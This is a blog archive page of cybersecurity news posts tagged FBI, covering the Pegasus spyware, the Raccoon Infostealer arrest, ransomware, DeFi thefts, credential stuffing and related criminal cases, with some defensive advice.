Search This Blog

Showing posts with label FBI. Show all posts

FBI Nearly Adopted NSO's Spyware

According to a report published by the New York Times on Saturday, several agents from the US Federal Bureau of Investigation worked to enhance the rollout of Pegasus, the notorious phone-hacking program created by Israel's NSO Group. 

What is Pegasus?

Once installed, Pegasus spyware enables the user to fully manage a target's phone, allowing them to see messages, listen in on calls, and access the phone as a remote listening device.

Significant numbers of human rights activists, journalists, politicians, and corporate executives were reportedly designated as potential targets of NSO's Pegasus program, which has caused criticism for the Israeli company responsible for its development. 

When smartphones are infected with Pegasus, they effectively become portable surveillance tools that can be used to read the target's messages, browse through the images, or even switch on the user's camera and microphone secretly.

FBI Purchased Pegasus 

The highly classified files, which were provided to the Times in response to a FOIA request, reveal that agency officials had developed guidelines for federal prosecutors concerning how to disclose Pegasus usage in court proceedings and were progressed in organizing to brief FBI heads on the malware.

Additionally, the FBI asserted that Pegasus had never been used to assist an FBI investigation. The FBI only obtained a restricted license for product testing and evaluation, the statement read "There was no functional use in support of any investigation."

The announcement represents a clear admission by the FBI that it purchased Pegasus, one of the most advanced hacking tools in existence.

The FBI examined NSO's Phantom software, which has the ability to hack US phones, earlier this year, the press reported. After learning that NSO's hackers were linked to violations of human rights all around the world and as negative press about the technology spread, the FBI eventually opted against utilizing it.

The New York Times broke the news of the FBI's acquisition of Pegasus in 2019 while the Trump administration was in control. However, the bureau has still not ruled out the potential of using comparable technology in the future, the report said, citing recent court records.

A legal brief submitted on the bureau's behalf last month stated that "just because the FBI eventually decided not to deploy the tool in support of criminal investigations does not mean it would not test, evaluate, and potentially deploy other similar tools for gaining access to encrypted communications used by criminals."



A Cyberattack Made Possible by Russia's Invasion of Ukraine

 


During the past months, several weeks after Russia began dropping bombs on Ukraine in late February, a talented young computer programmer named Mark Sokolovsky and his girlfriend have been climbing into a Porsche Cayenne to set out on a road trip. The purpose of this was to get away from the fighting as much as possible. 

During their trip, the pair passed through Poland and Germany before stopping in the Netherlands. They thought it was their last stop, believing it was their last stop from the sky. 

The people in charge of immigration back in the United States had no idea that FBI investigators were monitoring them at all times. They were constantly monitoring their counterparts in Europe as well.

Late last year, somebody named Sokolovsky, 26 was brought into federal court in the state of Texas as a defendant in a sealed criminal indictment. There are allegations in the indictment that allege that he was the primary innovator and/or director of a type of malware known as Raccoon Infostealer. Millions of computers have been infected with malicious software around the world. This allows hackers to steal login credentials to financial institutions and money from an uncountable number of victims.

Sokolovsky entered the Netherlands a few days later and was arrested in Amsterdam. He was charged with computer fraud, wire fraud, money laundering, and identity theft after crossing the border. Upon conviction, he would be sentenced to more than 20 years in prison. He remains in custody in the Netherlands while fighting an extradition proceeding, a process that would send him to the United States of America if convicted. 

Sokolovsky's Dutch attorney Niels Van Schaik, who is currently representing him in the extradition proceedings, has not responded to messages left for him. 

Sokolovsky's arrest last week was announced as part of a coordinated effort by an auditing agency to find out who the victims might be. The case was under seal until last week when authorities announced Sokolovsky's arrest. According to investigators, shortly after he was arrested, they were able to crack through a giant cache of stolen data summarizing millions of email addresses and login credentials. 

An announcement was made earlier this week by the FBI and prosecutors regarding the creation of a website as part of their announcement. As a result of this, it has become possible for victims to be able to check if there is any information about them contained within the data recovered by investigators by doing the following. 

Ashley Hoff, U.S. Attorney for the Western District of Texas, described the case as a very, very large case that has implications around the world. "This is a very, very global case," Ashley Hoff said.

There is a saying "we steal you deal":

Maas programs, developed by programmers, do not typically steal information from people. Instead, they license the software to other cybercriminals who then use it to rob the victim of their savings. Moreover, Raccoon's operators ensured that a copy of all the stolen information along with the actual evidence was kept. 

According to cybercrime experts, Raccoon Infostealer is just like any other legitimate software. The company offers 24-hour customer service and issues frequent updates to its software every few weeks. A week's rental price would be $75 or a month's rental would be $200. 

Raccoon Infostealer is one of the most sophisticated malware tools that was developed by expert cyber criminals and was initially offered for sale on Russian-language platforms popular with cybercriminals as well as English-language ones later on. As a result, it quickly gained attention from cybersecurity experts, and it was marketed under the slogan "We steal, you deal," so it was an instant hit. 

There was an early appearance of Raccoon Infostealer in early 2019 and it was first offered for sale on Russian-language platforms, which were popular with cybercriminals at the time, and then it was also made available on English-language platforms. This moniker, "We steal, you deal," is a slogan that was adopted by this company, which quickly rose to prominence among cybersecurity experts when it started attracting attention. 

Immediately after Sokolovsky was arrested in March, Raccoon's operators issued a message to their customers, informing them that they needed to shutter their operations. The message explained the fact that the war in Ukraine had disrupted their operations. 

Among the most popular types of malicious software is Raccoon Infostealer, which belongs to the Malware-as-a-Service class. It is unfortunate to inform you that, due to the 'special operation,' we will have to close down our Raccoon Stealer project, the group said in a statement. There are several members of our team who were responsible for critical components of the product at one time, but they are no longer with us. It has been a pleasure to work with you, and I am thankful for your time and experience, because, unfortunately, everything comes to an end sooner or later, so I was compelled to continue this conversation.

During the early stages of the invasion of Ukraine, President Vladimir Putin compelled people to refer to the invasion of Ukraine as a "special operation" to distinguish it from other kinds of invasions. It was highly risky for those who called it a war or an invasion, as they would risk serving long prison sentences. 

The Raccoon shutdown message has been interpreted as meaning that several senior programmers have been killed before the fighting has even begun. However, it could be a reference to the arrest of Sokolovsky, which many in the cybersecurity space thought was an indication of that. 

We left a message on the Raccoon Operators' website asking for comment, but they did not respond immediately. Sokolovsky's arrest last week sparked a statement from them in which they acknowledged that they didn't know him personally, and, when he disappeared in March, "we naturally thought the worst when we heard the news about it. 

The software was relaunched a few months later, with some critical changes made to its programming, experts said, with a revised version of the now-compromised software. 

On the run

Originally from Kharkiv in eastern Ukraine, Sokolovsky attended university in that city and has remained there ever since. Russian forces started bombarding the city heavily during the early stages of the war, which caused the city to suffer heavy damage. 

As reported on the cybersecurity blog run by Krebs, an acclaimed cybersecurity reporter, and analyst, authorities were able to tie Sokolovsky to Raccoon through an account he had set up on his iCloud account with as many as three accounts linked to the Raccoon malware program, available through Apple's AAPL stock price AAPL, -4.25%. 

Krebs reported that this allowed authorities to track Sokolovsky's movements for a period of two to three months. The police were also able to retrieve a photograph in which Sokolovsky is seen standing near a large pile of money with his face framed by it. 

During the past months, investigators have watched as Sokolovsky bounced back and forth from Kharkiv to the Ukrainian capital, Kyiv, and back and forth between the two cities. 

Upon hearing that he had turned up in Poland, near the German border, in late March, the situation changed dramatically. There was a photograph taken of Sokolovsky in a Porsche Cayenne with his girlfriend in the passenger seat as he drove into Germany in a Porsche Cayenne. 

During that period, Ukrainian men under the age of 60 were not allowed to leave their country. They were drafted into fighting the Russian invaders, who were invading Ukraine. As Krebs reported, investigators believe Sokolovsky may have blackmailed his way out of the country by offering him bribes. 

Krebs reported that a few days after Sokolovsky was caught in Amsterdam, authorities were able to pinpoint him. This is because his girlfriend posted pictures on Instagram of them showing that they were together in Amsterdam.

A Dutch court dismissed the petition for Sokolovsky's extradition to Texas last month, but the Russian has appealed the decision, and he is now in prison in the Netherlands. 

Reaching out across the globe 

Sokolovsky, the main architect of the Raccoon program is claimed to have received assistance from several accomplices while working on the program. Prosecutors said that both Italian and Dutch authorities participated in the investigation and assisted the authorities in their work. 

In addition to recovering some 50 million unique credentials from the FBI data cache, prosecutors said that the FBI also retrieved email addresses, bank logins, cryptocurrency addresses, and credit card numbers as part of the investigation. Even though they don't believe they have recovered all the data stolen by Raccoon Infostealer and are continuing to investigate, they say they may not be able to find all of it. 

Court documents indicate that some of the data recovered by the hackers included login information for several U.S. companies in addition to information on military members with access to armed forces computers, according to the documents.

Missing Cryptoqueen: Leaked Police Files May Have Alerted the OneCoin Fraudster Ruja Ignatova

 

Best known as the “Missing CryptoQueen,” convicted fraudster Ruja Ignatova who was included on the most wanted list by the US Federal Bureau of Investigation (FBI) is assumed to be receiving the information of the investigation before her disappearance. 
 
The 42-year-old fraudster, based in Bulgaria is convicted of her suspected involvement in the $4 billion OneCoin cryptocurrency fraud. The details of the scam were uncovered in a BBC podcast ‘The Missing Cryptoqueen’ devoted to the infamous fraudster. 

The police documents related to the case were apparently shown in the podcast by Frank Schneider, a former spy and trusted adviser to Ignatova. Following the allegations, Schneider is now facing extradition to the US for his role in the OneCoin fraud. 

While the metadata on the files suggests that Ignatova acquired the said documents through her own contacts in Bulgaria, Schneider denies the claims of obtaining the documents himself, which he says were obtained on a USB memory stick by Ignatova. 
 
Ignatova disappeared on October 25th, 2017, after being made aware of the police investigation into her OneCoin cryptocurrency. Following this, in June 2022 she was included in the FBI's most wanted list.
 
In an interview with the BBC, Schneider informed about the police files containing presentations made at a Europol meeting named ‘Operation Satellite.’ The meeting was attended by officials from Dubai, Bulgaria, the UK, Germany, and the Netherlands along with the FBI, the US Department of Justice, and the New York District Attorney five months before the disappearance of Ignatova. 
 
The said documents contained details of US authorities having a “high-placed confidential informant”, bank accounts from OneCoin receiving investor funds, and failed attempts of the UK's City of London to interview Ignatova. 

On being asked about the aforementioned files, Schneider said "When the Bulgarians participated at certain Europol meetings, it only took hours for her to get a complete rundown and get the minutes of what was said in those meetings.” “I can only deduce that it came from the circles that she was in and the she had through a variety of influential personalities.”

FBI Warns of Hack Operations From Iranian Hackers

The FBI cautions that the Iranian threat group Emennet Pasargad may conduct hack-and-leak activities against US interests, precisely the November midterm elections, despite the group's primary focus on attacking Israeli leaders.

The US Treasury announced penalties over five Iranians and Emennet Pasargad, the firm they worked for, in November 2021 after the US issued a warning in November 2020 that Iranian hackers had taken advantage of known weaknesses to acquire voter registration data.

According to the information from the FBI, Emennet has been targeting organizations, primarily in Israel, with cyber-enabled information operations since at least 2020. These operations included an initial intrusion, data theft, and subsequent leak, followed by attenuation through online and social media forums, and in some cases, the implementation of destructive encryption malware.

The gang also targets businesses with PHP-powered websites or MySQL databases that can be accessed from the outside. The FBI claims hackers frequently launch attacks using open-source software for penetration testing.

The Bureau claims that Emennet executes false-flag attacks against Israel using online personas like hacktivists or cybercriminal groups. It warns that the company may use the same strategies to target US entities. The majority of the measures mentioned in the report were ones the group employed in the 2020 U.S. Presidential election.

The FBI issued a warning, stating that the gang would 'probably' target popular content-management tools like Drupal and WordPress. The infamous Log4j vulnerability has also been used by Emennet in cyberattacks on at least one U.S.-based company.

Seyyed Mohammad Hosein Musa Kazemi and Sajjad Kashian, two Iranian consultants who started working for Emennet Pasargad, initiated several operations intended to sow discord and undermine voters' confidence in the American electoral process, were the subject of a $10 million reward offered by the U.S. State Department in February.

Although still at large, Kazemi and Kashian are thought to be in Iran. The FBI's list of cyber criminals wanted now includes the two as well. The FBI also provides organizations with advice on how to reduce the risk posed by Emennet and a list of tactics, methods, and procedures (TTPs) related to the group.


Cyber-Attackers Claim to Have Accessed Customer Data at Medibank Australia

 


According to Medibank, which covers one in six Australians, an unidentified person notified the company that some 200 gigabytes of data had been stolen. This included medical diagnoses and medical treatments, as part of a theft that began a week earlier when the company disclosed a theft of 200 gigabytes of data.

As far as the number of its 4 million customers who may have been affected, the company did not provide information. However, it warned that the number is likely to rise as the issue unfolds. It was announced by the Australian Federal Police that they had opened an investigation into the breach, but that they had no further comments to make.

An Australian newspaper report has warned that the data of at least 10 million customers may have been stolen. This adds a heightened layer of intrigue to a wave of cyberattacks on the country's largest companies since No. 2 Telco Optus, owned by Singapore Telecommunications Ltd, revealed a month ago that the data of ten million customers may have been stolen. 

The majority of public commentary has so far focused on the possibility that hackers could gain access to bank accounts if they steal data or used identity theft to gain access to personal information. An article in the Sydney Morning Herald stated that it received a message from a person claiming to be the Medibank hacker threatening to publish medical records for high-profile individuals without receiving any payment until the hacker has been paid for his or her work.

Currently, the Melbourne-based security company is working with several cyber-security firms and has also contacted the Australian Cyber Security Centre (ACSC), which is the government's lead agency for cyber security.

"This is a situation where we have very sensitive information regarding healthcare and that information, if made public by itself, could cause severe harm to Australians, and that is why we at the Australian Broadcasting Corporation are so actively involved with this," said Cybersecurity Minister Clare O'Neill in an exclusive interview with the ABC.

As cyber security experts pointed out, it was unclear whether the three disclosures on data breaches were related to a single incident. This is because these attacks were diverse. However, the perceived publicity generated by the Optus attack may have drawn public attention to the hacker networks created by this company.

"When there is the highly visible breach, such as what happened to Optus in Australia, then hackers take notice of it and think they are planning to try to see what I can get away with down there," said the executive editor Jeremy Kirk for Information Security Media Group, one of the leading cybersecurity specialist magazines out there.

Interestingly, more than 2.2 million shoppers get their bargains on a bargain website that is used by Optus rival Telstra Corp Ltd. which on Tuesday disclosed an issue with employee data breaches, while Woolworths Group Ltd on Thursday said an unidentified party gained unauthorized access to the customer database of that site.

It has been well documented that high-profile data breaches demonstrate how crucial it is to use multi-factor authentication at every level of a company's network - i.e. when the person uses an authentication code sent to a separate device to log in - to prevent data breaches, according to Sanjay Jha, chief scientist at the University of New South Wales Institute for Cybersecurity.

Jha told Reuters over the phone that, although they have implemented such controls for end users, they should have even tougher controls for internal servers, since server security is a major concern.

"Continuous authentication is necessary for people not to log in and leave after logging in and leave forever, allowing attackers to access your computer and compromise it." Jha continued.

Founder and chief intelligence officer of F5, Dan Woods, a former FBI cyberterrorism investigator, commented that Australia had "undoubtedly endured its most difficult few weeks from a cybercrime perspective, but on the positive side, it's been a wake-up call for the country, one that it may have needed." 

What is Ransomware 3.0? An Advanced Extortion Technique?


The Internet Crime Complaint Center of the FBI received 3,729 complaints related to ransomware in 2021, an 82% rise from two years ago and aggravating. As per the dept of the treasury, the top 10 ransomware groups took at least $5.2 billion dollars in extortion payments. 

Ransomware's massive scale and growth got the attention of leaders in business and policy, however, we should note how the ransomware operators may adapt and evolve to secure their earnings.

Prior to the ransomware boom, threat actors tried various extortion techniques. These involved thefts and the sale of sensitive information like credit card numbers. Some focused on ACH transfers and direct financial transactions. 

While others tried reselling system access for scrap value to other threat actors, or crypto mining, bringing the monetization issues downstream. The highest profit-bearing technique needed savvy operators and maintained, continuous access, meaning that getting caught could sabotage operations that required a considerable investment of time. 

Ransomware revolutionized the extortion game. The brute extortion technique was easy to execute and effective. 

Ransomware of the past didn't need to understand the victim network, didn't care for anti-forensics or much caution, and provided instant and direct payment without depending on black market resellers. 

With the life cycle getting tight, more profits, and a significantly low barrier to entry, ransomware laid paths for new cybercrime explosion. 

Future of Ransomware

The future is sure to witness threat actors modify the ransomware playbook. We may notice groups build more advanced tradecraft to disrupt attribution, lowering the effect of sanction lists (imposed by governments, including payment bans). 

Currently, we find ourselves in the initial stage of Ransomware 3.0 evolution, but we can expect more changes in the extortion models. Attackers may adopt traditional ransomware models, reselling stolen data along with/instead of extortion. 

We are already aware that threat actors are experimenting with various cryptocurrency schemes. 

To stay safe, the FBI suggests:

  • Update your operating system and software.
  • Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
  • Make an offline backup of your data.




Ex-NSA Employee Charged with Espionage Case

A former U.S. National Security Agency (NSA) employee from Colorado has been arrested on account of attempting to sell classified data to a foreign spy in an attempt to fulfill his personal problems facing because of debts. 

According to the court documents released on Thursday, the accused Jareh Sebastian Dalke, 30, was an undercover agent who was working for the Federal Bureau of Investigation (FBI). 

Jareh Sebastian said that he was in contact with the representative of a particular nation "with many interests that are adverse to the United States," he was actually talking to an undercover FBI agent, according to his arrest affidavit. 

Dalke was arrested on Wednesday after he allegedly agreed to transmit classified data. "On or about August 26, 2022, Dalke requested $85,000 in return for additional information in his possession. Dalke agreed to transmit additional information using a secure connection set up by the FBI at a public location in Denver,"  eventually it led to his arrest,  the DoJ said. 

Earlier he was employed at the NSA from June 6, 2022, to July 1, 2022, as part of a temporary assignment in Washington D.C as an Information Systems Security Designer. Dalke is also accused of transferring additional National Defense Information (NDI) to the undercover FBI agent at an undisclosed location in the U.S. state of Colorado. 

Following the investigation, he was arrested on September 28 by the law enforcement agency. As per the USA court law, Dalke was charged with three violations of the Espionage Act. However, the arrest affidavit did not identify the country to which Dalke allegedly provided information. 

The affidavit has been filed by the FBI and mentioned that Dalke also served in the U.S. Army from about 2015 to 2018 and held a Secret security clearance, which he received in 2016. The defendant further held a Top Secret security clearance during his tenure at the NSA. 

"Between August and September 2022, Dalke used an encrypted email account to transmit excerpts of three classified documents he had obtained during his employment to an individual Dalke believed to be working for a foreign government," the Justice Department (DoJ) said in a press release.

Interpol Arrests 12 Suspects for Running Sextortion Racket


A joint operation to crack down sex racket

Interpol announced the arrest of 12 individuals under suspicion of core members of transnational sextortion ring. 

The arrests happened in July and August because of a joint investigation done by Interpol's cybercrime division and police in Singapore and Hongkong. 

Under the Banner #YouMayBeNext, supported by 75 INTERPOL member countries and 21 private and public entities, the campaign focuses specifically on sextortion, Distributed Denial of Service (DDoS), and ransomware attacks. 

In an example of the challenges these cyber attacks represent, international police operations supported by INTERPOL has found and tracked down transnational sextortion ring that was able to extract around USD 47,000 from targets. 

As of now, the investigation has tracked 34 back to the syndicate. 

What is sextortion?

Sextortion is considered a criminal act and is a form of sexual exploitation that includes harrassing an individual, either via threat or manipulation, into making sexually explicit content and sending it over the internet. 

The suspects reached out to potential victims through online dating and sex platforms, then lure them into downloading a malicious mobile app and trick them into "naked chats." 

The suspects used this app to hack victim's phone contact lists, then threaten victims by blackmailing to leak their nude videos to their relatives and friends. 

The victims of the sextortion racket are mostly from Hongkong and Singapore. 

Raymond Lam Cheuk Ho, Acting Head of the Hong Kong Police’s Cyber Security and Technology Crime Bureau said:

"We conducted a proactive investigation and in-depth analysis of a zombie command and control server hosting the malicious application, which – along with the joint efforts by our counterparts – allowed us to identify and locate individuals linked to the criminal syndicate.”

INTERPOL's warning 

Besides this, Interpol has warned about a surge in sextortion incident in the recent years, the rise has been aggravated due to the Covid-19 pandemic. 

It mentions the risks of the sextortion, just a click away on a malicious link or an intimate video/picture to someone can expose users to sextortion threats. 

Last year, the FBI Internet Crime Complaint Center (IC3) alarmed about a sudden rise in sextortion complaints since the start of 2021. As per the experts, the attack has caused   financial losses of more than $8 Million until July 2021. 

The FBI got more than 16,000 sextortion complaints until July 2021, most of the victims fall between the age of 20 and 39. 

How to be safe from sextortion?

Security affairs reports the following measures to stay safe from sextortion threats: 

  • NEVER send compromising images of yourself to anyone, no matter who they are or who they say they are.
  • Do not open attachments from people you do not know. Links can secretly hack your electronic devices using malware to gain access to your private data, photos, and contacts, or control your web camera and microphone without your knowledge.
  • Turn off your electronic devices and web cameras when not in use.


FBI: Hackers use DeFi Bugs to Steal Cryptocurrency

 


Investors are being warned by the FBI that hackers are increasingly using Decentralized Finance (DeFi) platform security flaws to steal cryptocurrency.

According to the PSA, which was posted on the FBI's Internet Crime Complaint Center (IC3) today, nearly 97% of the $1.3 billion in bitcoin that was stolen between January and March 2022 came via DeFi sites. This represents a big increase from 72% in 2021 and roughly 30% in 2020, according to projections by the FBI.

The FBI urges people to be aware of the hazards, seek professional assistance if they are unsure, and research the security and general business practices of DeFi providers. Additionally, we all refer to DeFi providers as exchanges, markets, and other websites where you may buy, sell, trade, and borrow bitcoins and other digital assets.

The FBI's warning is due to a Chainalysis analysis from April that revealed how, per Q1 2022 statistics, DeFi cryptocurrency platforms are currently more targeted than ever.

In the majority of occurrences, the hackers rely on using security flaws in their platform's code or unauthorized access to drain cryptocurrency to addresses under their command.

According to Chainalysis, the threat actors responsible for these attacks used dangerous laundering services, like unlawful exchanges and coin tumblers on the dark web, to re-launder the majority of the stolen funds in 2022.

The FBI's alert provides investors with guidance that begins with basic cautions about performing due diligence before investing and then suggests the following:

Before investing, research DeFi platforms, protocols, and smart contracts and be aware of the dangers associated with DeFi investments.

Verify whether the DeFi investment platform has undergone one or more code audits done by impartial auditors. A code audit normally entails carefully examining and studying the platform's underlying code to find any flaws or vulnerabilities that might impair the platform's functionality.

Be wary of DeFi investment pools with short join windows and quick smart contract rollouts, especially if they don't perform the advised code audit.

Be mindful of the potential risks crowdsourced solutions pose for finding and patching vulnerabilities. Open source code repositories give anyone, even those with malicious intent, unauthorized access.

This year, no DeFi-taken monies have been reimbursed, indicating that attackers are less interested in protecting their stolen assets than they were in 2021 when almost 25% of all cryptocurrency stolen via DeFi platforms was eventually recovered and given to the victims.

The FBI established a link between the Lazarus and BlueNorOff (also known as APT38) North Korean threat organizations and the April attack of Axie Infinity's Ronin network bridge, now the largest crypto hack ever.

The $611 million breach of the decentralized merge protocols and network Poly System in August 2021 was the most significant cryptocurrency theft to date.




20K Users' Data was Stolen by Blackbyte Ransomware Group

 


Owing to a ransomware attack that impacted its network earlier this year, the NFL's San Francisco 49ers are distributing warning letters to all affected individuals, revealing a data breach impacting more than 20,000 of them.

A week prior to Super Bowl Sunday, the BlackByte ransomware group targeted the team's networks, sparking concerns about what would have transpired had the club retained its late-game lead two weeks earlier to win the championship game.

Personal information belonging to 20,930 people was accessed and taken during the hack between February 6 and February 11, 2022, according to the San Francisco Bay Area professional American football team.

On Monday, the company announced that an investigation had been updated and that the theft had taken six days. Also, it stated it has begun sending letters of notification to people whose data may have been exposed. The group said that it "conducted a thorough assessment of these data to discover the individuals whose data was stored within, and additional research to locate and validate the addresses for these people."

A total of 20,930 names and related Social Security numbers were acquired during the incident, the business further stated in its notification to the Maine Attorney General's Office, where it is allowed by law to report data breaches.

In order to take credit for the hack, the BlackByte gang began leaking files purportedly taken from the 49ers' network on February 12, just as the NFL was preparing for the Super Bowl 2022.

The ransomware organization released an archive with 292 MB worth of files it claimed were invoices taken from the 49ers' infected systems.

The group first surfaced in September 2021, according to experts, with ransomware that was poorly coded. A flaw was uncovered in it, and the cybersecurity company Trustwave exploited it to produce a free decryptor.

However, the organization was able to carry out many attacks after creating a second edition of the ransomware that fixed the Trustwave's flaws. Only one day after the 49ers attack became widely known, the FBI issued a security notice regarding BlackByte.

FBI Cyber Experts to Examine Attacks on Montenegro Government Infrastructure

 

The U.S. Federal Bureau for Investigation (FBI) will deploy a team of cyber experts to Montenegro to examine a massive, coordinated attack on the Balkan nation's digital infrastructure, the interior ministry announced on Wednesday. 

The rapid deployment of the FBI cyber team suggests "the excellent cooperation between the United States of America and Montenegro and proof that we can count on their support in any situation," said Montenegro's Ministry of Internal Affairs. 

Last week, a combination of ransomware and DDoS attacks disrupted government services and prompted the nation's electrical utility to switch to manual control. Montenegro's Agency for National Security accused Russia of being responsible for them and has said that up to €2.5mn were invested to launch cyber-attacks. 

“Coordinated Russian services are behind the cyber attack,” the ANB stated. “This kind of attack was carried out for the first time in Montenegro and it has been prepared for a long period of time.” 

According to Dusan Polovic, the Director of the Directorate for Information Security, twelve state entities had 150 computers laced with malware following the assault, and while there was no permanent damage to Ministry of Public Administration data, certain retail tax collection was affected. 

The infected stations have been removed from the network and hard drives have been removed from them for further forensics, he said, adding that the priority is to put the tax system into operation, but this will be done only when it is completely secure. 

Government officials have confirmed that National Security Agency (ANB) suspected that Kremlin was behind the attacks, saying they could be retaliation after Montenegro joined NATO in 2017 despite strong opposition from Russia. It also joined Western sanctions against Moscow because of its invasion of Ukraine in February. 
 
On Friday, the U.S. Embassy in Podgorica recommended U.S. citizens restrict movement and travel in the country to the necessities and have travel documents up to date and easily accessible, fearing that the attack could disrupt transportation (including border crossings and airport), and telecommunication sectors. 

Recently, Russia has also targeted multiple Eastern European nations including Moldova, Slovenia, and Bulgaria, via denial-of-service campaigns, which render websites unreachable by flooding them with junk data packets but don't damage data. But the assault against Montenegro's infrastructure seemed more coordinated, with targets including water supply systems, transportation services, and online government services, among many others.

FBI Alerts of Rise in Attacks Targeting DeFi Platforms

 

The FBI is alerting of an increase in cryptocurrency theft attacks on decentralised finance (DeFi) platforms.

According to the agency, criminals are exploiting the increased interest in cryptocurrency, as well as the complex functionality and open-source nature of DeFi platforms, to carry out nefarious activities.

According to the FBI, cybercriminals are stealing virtual currency and causing investors to lose money by utilising security flaws in the smart contracts that govern DeFi platforms. Smart contracts, defined as self-executing contracts containing the terms of an agreement between a buyer and a seller within their lines of code, are present throughout the decentralised blockchain network.

DeFi platforms accounted for roughly 97% of the $1.3 billion in cryptocurrencies stolen by cybercriminals between January and March 2022, an increase from 72% in 2021 and 30% in 2020.

According to the FBI, cybercriminals have also initiated flash loans to trigger an exploit in the DeFi platform's smart contracts (resulting in $3 million in cryptocurrency losses), exploited a signature verification bug in a DeFi platform's token bridge (resulting in $3 million in cryptocurrency losses), and tampered cryptocurrency price pairs (to steal $35 million in cryptocurrency).

Before investing, investors should research DeFi platforms, protocols, and smart contracts to identify potential risks and ensure that the DeFi investment platform's code has been audited at least once.

Furthermore, they should be cautious of DeFi investment pools with short timeframes for joining and rapid deployment of smart contracts, as well as the dangers posed by crowdsourced solutions in terms of bug hunting and patching.

According to the FBI, DeFi platforms should implement real-time analytics, monitoring, and code testing to address vulnerabilities and possibly shady activity, as well as an incident response plan that includes informing investors of any suspicious activity, including smart contract exploitation.

Proxies and Configurations Used for Credential Stuffing Attacks

 


About the attack

Threat actors are actively hacking home IP addresses to conceal credential stuffing attacks and boost their chances  of successful conduct, FBI alerts. 

Credential stuffing is a famous method of account hijacking where hackers use large lists of compromised login credentials combos and use them across various websites and apps aggressively to check if they're working. We all know that some users reuse same passwords, so the trick usually works. 

How are stolen credentials used?

Working credentials are then sold to others for early access. FBI said the config may include the website address to target, how to form the HTTP request, how to differentiate between a successful vs unsuccessful login attempt, whether proxies are needed, etc. 

In addition, cracking tutorial videos available via social media platforms and hacker forums make it relatively easy to learn how to crack accounts using credential stuffing and other techniques.

Leveraging proxies and configurations automates the process of attempting logins across various sites and facilitates exploitation of online accounts. 

Who are the victims?

In particular, media companies and restaurant groups are considered lucrative targets for credential stuffing attacks due to the number of customer accounts, the general demand for their services, and the relative lack of importance users place on these types of accounts. 

The Australian Federal Police and FBI discovered two websites having more than 300,000 sets of credentials attained via credential stuffing. 

How many users affected?

The sites had more than 175,000 registered users and made around $400,000 in sales. But website admins can notice any malicious activity if they know what to look for. At this point comes the role of residential proxies. 

Cyber criminals may also target a company’s mobile applications as well as the website. Mobile applications, which often have weaker security protocols than traditional web applications, frequently permit a higher rate of login attempts, known as checks per minute (CPMs), facilitating faster account validation.

Experts believe that by breaching home routers or other connected tech, hackers can focus their attempts through benign looking IPs to evade network defenders.

Existing security protocols can't flag or restrict residential proxies as often as proxies linked to data centers. Along with combo lists, threat actors purchase 'configs' or configurations, and other tools on dark forums to increase the success rates. 

FBI Alerts About Credential Stuffing Attacks, Configurations and Proxies Used


What is Credential Stuffing?

Credential stuffing attacks, also known as account cracking , consist trying to get online accounts via password and username combos from existing data leaks or which were bought on dark web forums. 

Depending on the fact that users keep using the same login for various accounts, credential stuffing attacks usually lead to significant financial damage caused by fraud purchases and system remediation and downtime, but also lead towards reputational damage. 

How is the attack done?

The use of authentic credentials lets hackers to access accounts and services across different sectors, this includes healthcare, media companies, restaurant groups, retail chains, and food delivery firms. 

Once the accounts are breached, the hackers make fake purchases of goods and services, trying to access extra online resources, this includes additional financial accounts. FBI warns that proxies and configurations let cybercriminals to automate exploitation and brute force of accounts. 

FBI involved 

FBI said in particular, media companies and restaurant groups are considered lucrative targets for credential stuffing attacks due to the number of customer accounts, the general demand for their services, and the relative lack of importance users place on these types of accounts. 

FBI has issued a warning that hackers can buy combo lists of login credentials from dedicated platforms and websites with configs (configurations) that let hackers to modify credential stuffing tools for targeting victims. 

The configuration consists HTTPS request format, website's address, how to identify successful attempts, if proxies are needed etc. The FBI also said that cybercriminals can get video tutorials to learn how credential stuffing can use to hack accounts. 

Security Week says "to bypass defenses, threat actors may employ proxies, including legitimate proxy services, to obfuscate their actual IP addresses. According to the FBI, cybercriminals have extensively used residential proxies to execute credential stuffing attacks, as these are blocked less frequently compared to proxies associated with data centers."

Netwalker: Ex Canadian Government Employee Pleads Guilty to Cybercrimes 

 

An ex-government of Canada official pleaded guilty in a US court to crimes related to data theft stemming from his involvement with the NetWalker ransomware group. 

Sebastien Vachon-Desjardins admitted on Tuesday that he had planned to commit bank fraud and phishing scams, intentionally damaged a protected computer, and also sent another demand regarding that illegally damaged computer. 

 Plea agreement filled 

Vachon-Desjardins, 34, who had previously been sentenced to six years and eight months in prison after entering a guilty plea to five criminal offenses in Canada, was deported to the United States in March. 
Vachon-Desjardins is "one of the most prolific NetWalker Ransomware affiliates," as per his plea agreement, and was in charge of extorting millions of dollars from several businesses all over the world. Along with 21 laptops, smartphones, game consoles, and other technological devices, he will also forfeit $21.5 million. 

He has pleaded guilty to conspiracy to commit computer fraud, conspiracy to commit wire fraud, intentionally harming a protected computer, and conveying a demand related to intentionally damaging a protected computer, according to a court filing submitted this weekThe accusations carry a maximum punishment of 40 years in jail combined. The attorneys did not identify the targeted business, but they did indicate that it is based in Tampa and was assaulted on May 1, 2020. 

 NetWalker gang's collapse

In 2019, a ransomware-as-a-service operation called NetWalker first surfaced. It is thought that the malware's creators are based in Russia. Its standard procedure – a profitable strategy also known as double extortion, includes acquiring sensitive personal data, encrypting it, and then holding it hostage in exchange for cryptocurrencies, or risk having the material exposed online.

According to reports, the NetWalker gang intentionally targeted the healthcare industry during the COVID-19 pandemic to take advantage of the global disaster. To work for other RaaS groups like Sodinokibi (REvil), Suncrypt, and Ragnarlocker, Vachon-Desjardins is suspected of being connected to at least 91 attacks since April 2020 in his capacity as one of the 100 affiliates for the NetWalker gang. 

The Feds dismantled the crime gangs' servers and the dark website is used to contact ransomware victims as part of the takedown of the NetWalker gang. Then they took down Vachons-Desjardins, who, according to the FBI, made $27 million for the NetWalker gang. 

His role in cybercrime is said to have included gathering information on victims, managing the servers hosting tools for reconnaissance, privilege escalation, data theft, as well as running accounts that posted the stolen data on the data leak site and collecting payments following a successful attack. 

However, some victims did pay fees, and the plea deal connected Vachons-Desjardins to the successful extortion of roughly 1,864 Bitcoin in ransom payments, or about $21.5 million, from multiple businesses around the world.

Phishing Emails Faking Voicemails aim to Steal Your Data

 

Vishing is the practice of sending phishing emails to victims that appear to be voicemail alerts to acquire their Microsoft 365 and Outlook login information. Researchers at Zscaler's ThreatLabz said this email campaign, which resembles phishing emails from a few years ago, was discovered in May and is still active. 

